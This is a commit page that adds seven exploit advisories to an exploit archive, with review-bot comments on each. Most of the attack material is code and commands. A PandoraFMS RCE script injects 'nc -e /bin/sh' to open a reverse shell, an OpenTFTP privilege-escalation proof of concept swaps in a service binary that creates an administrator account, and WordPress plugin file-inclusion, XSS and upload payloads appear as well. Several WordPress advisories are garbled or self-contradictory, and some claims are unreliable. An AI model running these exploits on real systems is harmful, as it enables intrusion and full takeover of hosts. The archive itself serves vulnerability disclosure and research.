Commit
7 changes to exploits/shellcodes OpenTFTP 1.66 - Local Privilege Escalation Wordpress Plugin tutor.1.5.3 - Local File Inclusion Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting Wordpress Plugin wordfence.7.4.5 - Local File Disclosure Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload PANDORAFMS 7.0 - Authenticated Remote Code Execution WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
Offensive Security
committed
Feb 14, 2020
1 parent
875c0a9
commit 21abbd7
Showing
8 changed files
with
316 additions
and
0 deletions.
@@ -0,0 +1,39 @@ | ||
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/tutor/ | ||
|
||
=================================================================== | ||
Vulnerable page: | ||
/instructors.php | ||
=================================================================== | ||
Vulnerable Source: | ||
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); | ||
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; | ||
7: include include $include_file; | ||
requires: | ||
4: if(!empty($sub_page)) | ||
6: if(file_exists($include_file)) | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] | ||
================================================================================= | ||
contact me: | ||
telegram: @MF0584 | ||
gmail: mehranfeizi13841384@gmail.com | ||
=================================================================== | ||
Vulnerable page: | ||
/instructors.php | ||
=================================================================== | ||
Vulnerable Source: | ||
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); | ||
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; | ||
7: include include $include_file; | ||
requires: | ||
4: if(!empty($sub_page)) | ||
6: if(file_exists($include_file)) | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] | ||
================================================================================= |
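Review bot: The second `Vulnerable page:` block (from the second `Vulnerable page:` heading to the end of the hunk) repeats the first one word for word, so the duplicate should be dropped. The header `# Tile:` is a typo for `# Title:`; the same typo appears in the tutor XSS, wordfence and contact-form-7 files added by this commit. The quoted `7: include include $include_file;` doubles the keyword, which looks like a copy artefact from the source viewer rather than the plugin's code, and listing lines 3, 5, 7 and then 4, 6 under `requires:` makes the excerpt hard to follow; quoting lines 3–7 once, in order, would read better. The advisory also does not say whether the page is reachable without authentication or which version fixes it, which an operator needs in order to rate the finding.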
@@ -0,0 +1,18 @@ | ||
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/tutor/ | ||
|
||
=================================================================== | ||
Vulnerable page: | ||
/Quiz.php | ||
=================================================================== | ||
Vulnerable Source: | ||
473: echo echo $topic_id; | ||
447: $topic_id = sanitize_text_field($_POST['topic_id']); | ||
=================================================================== | ||
Exploit: | ||
localhost/wp-content/plugins/tutor/classes/Quiz.php | ||
$_POST('topic_id') = <script>alert('mehran')</script> | ||
================================================================================= |
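Review bot: The exploit line `$_POST('topic_id') = <script>alert('mehran')</script>` is not supported by the quoted source: line 447 passes the value through `sanitize_text_field()`, which in WordPress core strips tags, so a raw `<script>` string is unlikely to reach the `echo` at line 473 unchanged. The advisory should show the actual rendered output, or describe the unescaped context in which the value is printed; without that a reader cannot confirm the persistent XSS claim. `$_POST('topic_id')` is also function-call notation for what is an array key, `$_POST['topic_id']`, and `echo echo $topic_id;` doubles the keyword, which looks like a viewer artefact.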
@@ -0,0 +1,14 @@ | ||
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-12 | ||
# vendor home page: https://wordpress.org/plugins/wordfence/ | ||
|
||
============================================================================== | ||
Vulnerable Source: | ||
5662: readfile readfile($localFile); | ||
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file'])); | ||
================================================================================= | ||
Exploit: | ||
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD] | ||
================================================================================= |
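Review bot: The advisory does not state the privilege or nonce context in which line 5645 of wordfenceClass.php is reached, and the exploit URL requests the class file directly, which in a WordPress plugin normally does not execute a method; the real entry point (admin page or AJAX action) and the role needed to reach it should be named, since that decides the severity for operators. The two source lines are listed in reverse order (5662 before 5645) and `readfile readfile($localFile);` doubles the keyword, which looks like a viewer artefact. A fixed version or a note that the vendor was contacted is also missing.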
@@ -0,0 +1,39 @@ | ||
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload | ||
# Author: mehran feizi | ||
# Category: webapps | ||
# Date: 2020-02-11 | ||
# vendor home page: https://wordpress.org/plugins/contact-form-7/ | ||
|
||
Vulnerable Source: | ||
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file)) | ||
82: $file = $_FILES[$name] : null; | ||
132: $new_file = path_join($uploads_dir, $filename); | ||
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); | ||
121: $uploads_dir = wpcf7_upload_tmp_dir(); | ||
131: $filename = wp_unique_filename($uploads_dir, $filename); | ||
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); | ||
121: $uploads_dir = wpcf7_upload_tmp_dir(); | ||
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); | ||
126: $filename = wpcf7_antiscript_file_name ($filename); | ||
125: $filename = wpcf7_canonicalize ($filename, 'as-is'); | ||
124: $filename = $file['name']; | ||
82: $file = $_FILES[$name] : null; | ||
82: $file = $_FILES[$name] : null; | ||
78: ⇓ function wpcf7_file_validation_filter($result, $tag) | ||
|
||
|
||
Exploit: | ||
<?php | ||
$shahab="file.jpg"; | ||
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php"); | ||
curl_setopt($ch, CURLOPT_POST, true); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, | ||
array('zip'=>"@$shahab")); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | ||
$result = curl_exec($ch); | ||
curl_close($ch); | ||
print "$result"; | ||
?> | ||
|
||
Location File: | ||
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg |
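Review bot: The `Vulnerable Source:` list does not support the "Remote File Upload" claim as written: line 82 is quoted three times and lines 121/122 twice, the lines are out of order, and everything between 82 and 134 inside `wpcf7_file_validation_filter` — where the function named at the end of the list presumably validates the file — is omitted, so a reader cannot see why validation is bypassed. The PoC posts a field named `zip` to `modules/file.php` directly, whereas line 82 reads `$_FILES[$name]` for a form-tag name, and the `Location File:` path under the plugin directory contradicts line 132, which joins the file onto `wpcf7_upload_tmp_dir()`; the advisory should include a response or directory listing that shows the upload actually landed. The `⇓` glyph on the `78:` line is a viewer artefact and should be removed from the file.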
@@ -0,0 +1,77 @@ | ||
# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution | ||
# Date: 2020-02-12 | ||
# Exploit Author: Engin Demirbilek | ||
# Vendor homepage: http://pandorafms.org/ | ||
# Version: 7.0 | ||
# Software link: https://pandorafms.org/features/free-download-monitoring-software/ | ||
# Tested on: CentOS | ||
# CVE: CVE-2020-8947 | ||
|
||
#!/bin/python | ||
''' | ||
PANDORAFMS 7.0 Authenticated Remote Code Execution x4 | ||
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. | ||
incase default vulnerable variable won't work, change the position of payload to one of the following ip_src, dst_port, src_port | ||
Author: Engin Demirbilek | ||
Github: github.com/EnginDemirbilek | ||
CVE: CVE-2020-8947 | ||
''' | ||
import requests | ||
import sys | ||
|
||
if len(sys.argv) < 6: | ||
print "Usage: ./exploit.py http://url username password listenerIP listenerPort" | ||
exit() | ||
|
||
url = sys.argv[1] | ||
user = sys.argv[2] | ||
password = sys.argv[3] | ||
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#' | ||
|
||
login = { | ||
'nick':user, | ||
'pass':password, | ||
'login_button':'Login' | ||
} | ||
req = requests.Session() | ||
print "Sendin login request ..." | ||
login = req.post(url+"/pandora_console/index.php?login=1", data=login) | ||
|
||
payload = { | ||
'date':"", | ||
'time':"", | ||
'period':"", | ||
'interval_length':"", | ||
'chart_type':"", | ||
'max_aggregates':"1", | ||
'address_resolution':"0", | ||
'name':"", | ||
'assign_group':"0", | ||
'filter_type':"0", | ||
'filter_id':"0", | ||
'filter_selected':"0", | ||
'ip_dst':payload, | ||
'ip_src':"", | ||
'dst_port':"", | ||
'src_port':"", | ||
'advanced_filter':"", | ||
'aggregate':"dstip", | ||
'router_ip':"", | ||
'output':"bytes", | ||
'draw_button':"Draw" | ||
} | ||
|
||
print "[+] Sendin exploit ..." | ||
|
||
exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={ | ||
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', | ||
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', | ||
'Accept-Encoding':'gzip, deflate', | ||
'Content-Type':'application/x-www-form-urlencoded'}) | ||
|
||
if exploit.status_code == 200: | ||
print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port." | ||
else: | ||
print "[-] Couldn't send the HTTP request, try again." |
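Review bot: The script is Python 2 only (`print "..."` statements throughout, and the shebang `#!/bin/python` does not pin a version), but neither the header nor the docstring says so, nor that `requests` must be installed; adding `# Requirements: python2, requests` to the header would save a failed run. `exit()` after the usage message should be `sys.exit(1)` so the shell sees a failure status. The name `payload` is first bound to the string built from argv and then rebound to the POST dictionary, which reads as two different things; giving the string its own name would make the `'ip_dst':payload` entry self-explanatory.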
@@ -0,0 +1,19 @@ | ||
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion | ||
# Author : mehran feizi | ||
# Vendor : https://wordpress.org/plugins/ultimate-member/ | ||
# Category : Webapps | ||
# Date : 2020-02-11 | ||
# Vendor home page: https://wordpress.org/plugins/ultimate-member/ | ||
|
||
Vulnerable Page: | ||
/class-admin-upgrade.php | ||
|
||
|
||
Vulnerable Source: | ||
354: if(empty($_POST['pack'])) else | ||
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php'; | ||
|
||
|
||
Exploit: | ||
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php | ||
$_POST('pack')=<script>alert('xss')</script> |
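Review bot: The `Exploit:` section contradicts the title: line 356 includes `$_POST['pack']` as part of a file path (file inclusion), yet the payload shown is `$_POST('pack')=<script>alert('xss')</script>`, which demonstrates nothing about inclusion, and `$_POST(...)` is function-call notation for an array key. The exploit path `wp-content/plugins/worprees plugin bug dar/ultimate-member/...` contains the author's local folder name and is not a plugin path. `354: if(empty($_POST['pack'])) else` is garbled and line 356 doubles `include_once`; both look like copy artefacts, and quoting the two lines verbatim plus stating whether class-admin-upgrade.php is reachable by a non-administrator would let operators judge the severity. The vendor URL is given twice (`# Vendor :` and `# Vendor home page:`).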
@@ -0,0 +1,103 @@ | ||
# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation | ||
# Exploit Author: boku | ||
# Date: 2020-02-12 | ||
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/ | ||
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download | ||
# Version: 1.66 | ||
# Tested On: Windows 10 (32-bit) | ||
|
||
# About: | ||
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, | ||
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available." | ||
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/ | ||
|
||
# Vulnerability Details: | ||
# On Windows, Open TFTP Server v1.66, suffers from insecure file & folder permissions. | ||
# This allows a low-privilge, local attacker to escalate their permissions to Administrator; | ||
# by replacing the 'TFTPServer' service binary with a maliciously-crafted, binary executable. | ||
# The TFTP Server runs as an 'Auto_Start' Service, with 'LocalSystem' priviledges, after the | ||
# default installation. After the attacker has planted the malicious binary, the code will | ||
# be executed with System priviledges on the next boot of the windows device. See PoC below for details. | ||
|
||
## Service Information (there is also an Unquoted Service Path) | ||
C:\>sc qc TFTPServer | ||
SERVICE_NAME: TFTPServer | ||
TYPE : 10 WIN32_OWN_PROCESS | ||
START_TYPE : 2 AUTO_START | ||
ERROR_CONTROL : 0 IGNORE | ||
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe | ||
LOAD_ORDER_GROUP : | ||
TAG : 0 | ||
DISPLAY_NAME : Open TFTP Single Port Server | ||
DEPENDENCIES : | ||
SERVICE_START_NAME : LocalSystem | ||
|
||
## Insecure Folder Permission | ||
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F | ||
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F | ||
BUILTIN\Users:(OI)(CI)(ID)R | ||
NT AUTHORITY\Authenticated Users:(ID)C | ||
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C | ||
|
||
## Insecure File/Service Permission | ||
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F) | ||
NT AUTHORITY\SYSTEM:(I)(F) | ||
BUILTIN\Users:(I)(RX) | ||
NT AUTHORITY\Authenticated Users:(I)(M) | ||
|
||
## Local Privilege Escalation Proof of Concept | ||
#0. Download & install Open TFTP Server v1.66 | ||
|
||
#1. Create low privileged user & change to the user | ||
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full" | ||
User name lowPrivUser | ||
Local Group Memberships *Users | ||
Global Group memberships *None | ||
C:\>whoami | ||
mycomputer\lowprivuser | ||
|
||
#2. Move the Service EXE to a new name | ||
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe | ||
1 file(s) moved. | ||
|
||
#3. Create malicious binary on kali linux | ||
1) Download dependencies | ||
root@kali# apt install gcc-mingw-w64-i686 wine64 -y | ||
2) Add Admin User C Code | ||
root@kali# cat addAdmin.c | ||
#include<windows.h> | ||
int main(void){ | ||
system("net user hacker mypassword /add"); | ||
system("net localgroup Administrators hacker /add"); | ||
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0); | ||
return 0; | ||
} | ||
3) Compile Code | ||
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe | ||
|
||
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host | ||
|
||
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder | ||
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\ | ||
1 file(s) moved. | ||
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe" | ||
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe | ||
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe | ||
|
||
#6. Reboot the Computer | ||
|
||
#7. Look at that new Admin | ||
C:\Users\lowPrivUser>net users hacker | findstr "Local name active" | ||
User name hacker | ||
Account active Yes | ||
Local Group Memberships *Administrators *Users | ||
|
||
C:\Users\lowPrivUser>net localgroup Administrators | ||
Alias name Administrators | ||
Comment Administrators have complete and unrestricted access to the computer/domain | ||
|
||
Members | ||
------------------------------------------------------------------------------- | ||
Administrator | ||
boku | ||
hacker |
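Review bot: The advisory documents the root cause — `NT AUTHORITY\Authenticated Users:(I)(M)` on OpenTFTPServerSP.exe and `(ID)C` on the install folder — but gives no remediation, which is what an operator reading it needs; a short `# Fix:` section stating that the install folder and service binary should grant Authenticated Users read/execute only (matching the `BUILTIN\Users` entry) would close that gap. The "there is also an Unquoted Service Path" remark is not borne out by the `sc qc` output, where `BINARY_PATH_NAME` is `C:\OpenTFTPServer\OpenTFTPServerSP.exe` with no spaces, so that claim should be dropped or qualified. The C PoC is linked with `-l ws2_32` although it calls no Winsock function, so the flag can be dropped. Typos in the Vulnerability Details paragraph: `low-privilge`, `priviledges` (twice).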